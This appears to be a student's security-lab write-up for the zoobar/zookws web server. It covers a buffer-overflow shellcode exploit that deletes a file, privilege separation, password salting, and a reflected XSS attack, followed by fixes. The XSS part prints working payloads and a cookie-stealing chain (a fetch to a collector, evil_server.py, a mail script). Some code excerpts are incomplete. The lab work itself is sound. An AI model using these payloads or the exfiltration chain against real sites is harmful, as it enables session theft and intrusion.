- ZOOKWS Web Server:
- 1.1 Finding Buffer Overflows
- 1.2 Code Injection
- 2.1 privilege separation
- 2.2.1 privilege separating login service
- 2.2.2. Password Hashing and Salting
- 2.3. privilege separating bank service
- 3. Browser Protection
- 4. Fixing the Vulnerabilities
The zookws web server is running a simple python web application, zoobar, where users transfer "zoobars" ( credits) between each other.
- Using command line, navigate to the project directory
cd ~/zookws/
- Compile the code
make all
- Run the server (args: {port:8080})
./zookd-exstack 8080
- Test the exploit-template.py script in another terminal window (args: host=localhost, port=8080, overflow=1200)
python ./exploit-template.py localhost 8080 1200
The goal here is to injected code will unlink (remove) a sensitive file on the server, namely "grades.txt". using the *-exstack binaries, since they have an executable stack that makes it easier to inject code.
Afterwards, compile the assembly code into a binary file (shellcode.bin)
Testing the "shellcode.bin"
Make sure that "grades.txt" exist at the project folder
Compile using make aand run the "run-shellcode" program providing the "shellcode.bin" path as argument
./run-shellcode shellcode.bin
And then inject the compiled Shellcode.S to be executed on the web server:
Here I choose the “value[512]” variable of “http_request_headers” function, the exploit will send the shellcode so it will fill the start of the “value” variable buffer. And the calculate the remaining space until the return pointer of the function, and overwrite the return pointer with the address of the start of the exploited buffer where the compiled shellcode start and by this the function will return back to itself and execute the shellcode which will delete the grades.txt file from the server.
To run this exploit, first run the server on desired port
./zookd-exstack 8080
Then while the server is running , execute the exploit-template.py script and watch how the "grades.txt" file is deleted.
python ./exploit-template.py localhost 8080
Privilege separation challenges: first, requires to take apart the application and split it up in separate pieces. Second, ensure that each piece runs with minimal privileges, which requires setting permissions precisely and configuring the pieces correctly.
- Create jail directory
- Create virtual environment for the web server python code in the jail directory
- Install the required python packages in the virtual environment
- compile the c code and check for required files and directories and copy them to the jail directory
- copy any required packages and environment variables to the jail directory
- change the owners and permissions of the jail directory properly
the setup.sh script will do all the above steps
cd project/directory
make all
sudo ./setup.sh
- Activate the virtual environment
- Run the web server loader executable zookld which is the only executable that runs with root privileges and located out of jail directory
- then the zookld will load the web server executable zookd and zookhttp processes by attaching each process to new forked chrooted jail process
cd jail/directory
source venv/bin/activate
cd project/directory
sudo ./zookld 8080
- Run the web server with zookld-exstack executable which execute the http service tht compiled with executable stack (zookhttp-exstack)
- Run the exploit-template2.py
cd jail/directory
source venv/bin/activate
cd project/directory
sudo ./zookld-exstack 8080
Separate the code that deals with user authentication (i.e., passwords and tokens) from the rest of the application code. The current zoobar application stores everything about the user (their profile, their zoobar balance, and authentication info) in the Person table (see zoodb.py). We want to move the authentication info out of the Person table into a separate Cred table (Cred stands for Credentials), and move the code that accesses this authentication information (i.e., auth.py) into a separate service.
- Create jail directory
- compile the c code and check for required files and directories and copy them to the jail directory
- copy any required packages and environment variables to the jail directory
- change the owners and permissions of the jail directory properly
the setup.sh script will do all the above steps
cd project/directory
make all
sudo ./setup.sh
- Run the web server loader executable zookld which is the only executable that runs with root privileges and located out of jail directory
- then the zookld will load the web server executable zookd, zookhttp and authsvc processes by attaching each process to new forked chrooted jail process
cd project/directory
sudo ./zookld 8080
Implement password hashing and salting in the authentication service.
- Extending the cred table to include a salt column.
- modify register and login functions to use the salt column.
- store the salt in the database and use it to hash the password before storing it in the database.
To improve the security of zoobar balances, the plan is similar to operations made on the authentication service: split the zoobar balance information into a separate Bank database, and set up a bank_svc service, whose job it is to perform operations on the new Bank database and the existing Transfer database. As long as only the bank_svc service can modify the Bank and Transfer database.
- Create jail directory
- compile the c code and check for required files and directories and copy them to the jail directory
- copy any required packages and environment variables to the jail directory
- change the owners and permissions of the jail directory properly
the setup.sh script will do all the above steps
cd project/directory
make all
sudo ./setup.sh
- Run the web server loader executable zookld which is the only executable that runs with root privileges and located out of jail directory
- then the zookld will load the web server executable zookd, zookhttp and authsvc processes by attaching each process to new forked chrooted jail process
cd project/directory
sudo ./zookld 8080
cd project/directory
sudo ./launch.sh 8080 1
- the second argument is indicator if we want to start fresh jail or completely delete the jail directory and start fresh
The goal is to create a URL that, when accessed, will cause the victim's browser to execute some JavaScript you as the attacker has supplied.
- When examining a URLs, there is one where the parameter is sent along with the URL, and then reflected back to the user view.
- The url is http://localhost:8080/zoobar/index.cgi/users?user=user_name
- The user_name parameter is reflected back to the search box in the users page and its actually part of the value attribute of the input tag
- By replacing the user_name with a javascript code, we can execute the javascript code in the victim's browser
- The javascript code that will be executed is alert(document.cookie); which will pop up an alert box with the victim's cookies
- in order to execute the javascript code, we need to escape the double quotes and the angle brackets.
- The final url will be http://localhost:8080/zoobar/index.cgi/users?user=%22%3Cp%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C/p%3E%22
- this will translate to
which will be reflected and print the victim's cookies in an alert box
- creating different url from previous attack, this making sure that the victim won't notice the attack
<!-- original source -->
<input type="text" name="user" value="{{ req_user }}" size=10></span><br>
<!-- the final payload -->
"size=10><script>fetch(`http://localhost:3000/cookie/${document.cookie}`)</script><input type="hidden
- creating "send_mail.sh" shell script that will send the cookies to my mail
echo "Cookie value is: $1" | mail -s "$SUBJECT" "$TO"
- creating python server "evil_server.py" that will listen to the request and get the cookies as request parameter
- the python server will execute the shell script and send the cookies to my mail
server = HTTPServer((host, port), RequestHandler)
cookie = os.path.basename(path).replace('cookie/', '')
output = subprocess.check_output(['sh', 'send_mail.sh', cookie])
- To fix the vulnerability, we need to escape the user input before printing it to the page using request.form.get() function
- this way, the input will be escaped and won't reflect directly to the page
- the line that need to be changed is in the "users.html" file
- <!--<input type="text" name="user" value="{{ req_user }}" size=10></span><br>-->
+ <input type="text" name="user" value="{{ request.form.get('user', '') }}" size=10></span><br>
- Attacker can try to brute force the password of a user
- Attacker can try to brute force other usernames
To fix the first login I had to limit the number of login attempts to 5 attempts per 2 minutes and block the user for 2 minutes if the user exceeded the limit But then I found another vulnerability, the attacker can try to brute force other usernames, so i added delay of 1 second after each login attempt to prevent brute force attacks or at least make it harder for the attacker to brute force other usernames
- created new table in the database named failed_logins which store the number of login attempts and the time of the last login attempt for each user.
- Add new table in the database named failed_logins which store the number of login attempts and the time of the last login attempt for each user.
- Modify the "checkLogin" function in login.py file which check if the user exceeded the limit before actually trying to log in the user. if the user exceeded the limit, the user will be blocked for 2 minutes and the user will be able to login again after 2 minutes. if the user didn't exceed the limit, and the login failed, a new record will be added to the failed_logins table with the time of the last login attempt for the user if the user didn't exceed the limit, and the login succeeded, the records for the user will be deleted from the failed_logins table.
The database schema for the failed_logins table:
class FailedLogin(CredBase):
__tablename__ = 'failed_logins'
id = Column(Integer, primary_key=True)
cred_id = Column(String, ForeignKey('cred.username'))
cred = relationship("Cred", back_populates="failed_logins")
timestamp = Column(DateTime)
The "checkLogin" function modification in login.py file:
def checkLogin(self, username, password, blocking_duration_minutes=2, max_attempts=5):
now = datetime.now()
cred = Cred.get_by_username(username)
attempts = FailedLogin.get_failed_attempts(cred, now, blocking_duration_minutes)
if len(attempts) >= max_attempts: # Too many failed attempts
time_left = get_remaining_time(attempts, now, blocking_duration_minutes)
login_error = "Too many failed attempts. Try again in %s" % time_left
return login_error
# Check credentials
token = auth_client.login(username, password)
if token is not None: # Successful login
return self.loginCookie(username, token)
else: # Failed login
# Sleep for 1 second to prevent brute force attacks
return None
- User can send zoobars to himself
- Attacker can steal zoobars from a user by sending negative zoobars to the user
Add validation to the zoobar input to prevent the user from sending zoobars to himself and to prevent the attacker from stealing zoobars from a user by sending negative zoobars to the user
- modify the "transfer" function in the bank.py file .
def transfer(sender, recipient, zoobars, token):
if not auth_client.check_token(sender,token):
return "Invalid token!"
db = bank_setup()
sender_bank = db.query(Bank).get(sender)
recipient_bank = db.query(Bank).get(recipient)
if sender_bank is None:
return "Sender does not exist!"
if recipient_bank is None:
return "Recipient does not exist!"
if zoobars < 0:
return "Cannot transfer negative zoobars!"
# check if recipient is sender
if sender == recipient:
return "Cannot transfer zoobars to yourself!"
sender_balance = sender_bank.zoobars - zoobars
recipient_balance = recipient_bank.zoobars + zoobars
if sender_balance < 0 or recipient_balance < 0:
return "Insufficient funds!"
sender_bank.zoobars = sender_balance
recipient_bank.zoobars = recipient_balance
log_transfer(sender, recipient, zoobars)
return "Transfer successful!"
- Attacker can execute arbitrary code on the server
The eval call was there to parse the input of transfer form to convert the zoobars input to an integer, so I replaced the eval call with int() function to parse the input to an integer. and also validated that the input is an integer to prevent error exceptions.
- modify the "transfer" function in the transfer.py file .
def transfer():
warning = None
if 'recipient' in request.form:
zoobars = 0
if request.form['zoobars'].isnumeric():
zoobars = int(request.form['zoobars'])
res = bank_client.transfer(g.user.person.username,request.form['recipient'], zoobars, g.user.token)
warning = "%s" % res
except (KeyError, ValueError, AttributeError) as e:
warning = "Transfer to %s failed" % request.form['recipient']
return render_template('transfer.html', warning=warning)